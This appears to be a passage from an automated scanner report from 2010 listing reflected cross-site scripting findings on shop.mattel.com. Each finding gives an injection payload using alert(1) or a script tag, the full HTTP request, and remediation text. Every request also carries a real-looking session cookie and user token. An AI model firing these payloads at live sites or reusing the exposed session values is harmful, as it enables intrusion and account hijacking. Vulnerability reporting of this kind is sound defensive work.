Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fed3"-alert(1)-"651a9d93d41 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp?categoryId=37181155fed3"-alert(1)-"651a9d93d41 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f001c"-alert(1)-"119cc5f951e was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response. Note that in the request shown below the payload actually sits at the end of the categoryId query value, while the ;jsessionid path parameter carries the unchanged session identifier; this finding therefore reproduces the categoryId reflection on /category/index.jsp for the URL form that carries the session in the path, rather than demonstrating a separate injection point.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284f001c"-alert(1)-"119cc5f951e HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into an HTML comment. The payload 68cfa--><script>alert(1)</script>ace09a66a83 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response. As with the preceding finding, the request shown below carries the payload in the categoryId query value and leaves the ;jsessionid path parameter unchanged; the echoed debug comment in the response reproduces both the session identifier and the injected query string.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 --> ...[SNIP]...
1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /category/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ab2"-alert(1)-"a83d7d56bb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp?57ab2"-alert(1)-"a83d7d56bb0=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /category/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d0648--><script>alert(1)</script>18bef240369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /category/index.jsp?d0648--><script>alert(1)</script>18bef240369=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: d0648--><script>alert(1)</script>18bef240369=1 --> ...[SNIP]...
1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62aed--><script>alert(1)</script>19aa858cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /emailSignup/index.jsp?62aed--><script>alert(1)</script>19aa858cf=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:50 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <!-- === Request Query String: 62aed--><script>alert(1)</script>19aa858cf=1 --> ...[SNIP]...
1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130c3"-alert(1)-"e1a4d627d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /emailSignup/index.jsp?130c3"-alert(1)-"e1a4d627d26=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:49 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b7b"-alert(1)-"9499bf6d796 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp?categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the cp request parameter is copied into an HTML comment. The payload 51834--><script>alert(1)</script>f36fc4cd686 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp?categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77aaf"%3balert(1)//1f834e93093 was submitted in the jsessionid parameter. This input was echoed as 77aaf";alert(1)//1f834e93093 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp;jsessionid=77aaf"%3balert(1)//1f834e93093 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into an HTML comment. The payload 320da--><script>alert(1)</script>34133063b89 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp;jsessionid=320da--><script>alert(1)</script>34133063b89 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /family/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c93c--><script>alert(1)</script>4ed9c217b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp?9c93c--><script>alert(1)</script>4ed9c217b51=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /family/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab71"-alert(1)-"9445a5148d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp?fab71"-alert(1)-"9445a5148d9=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; 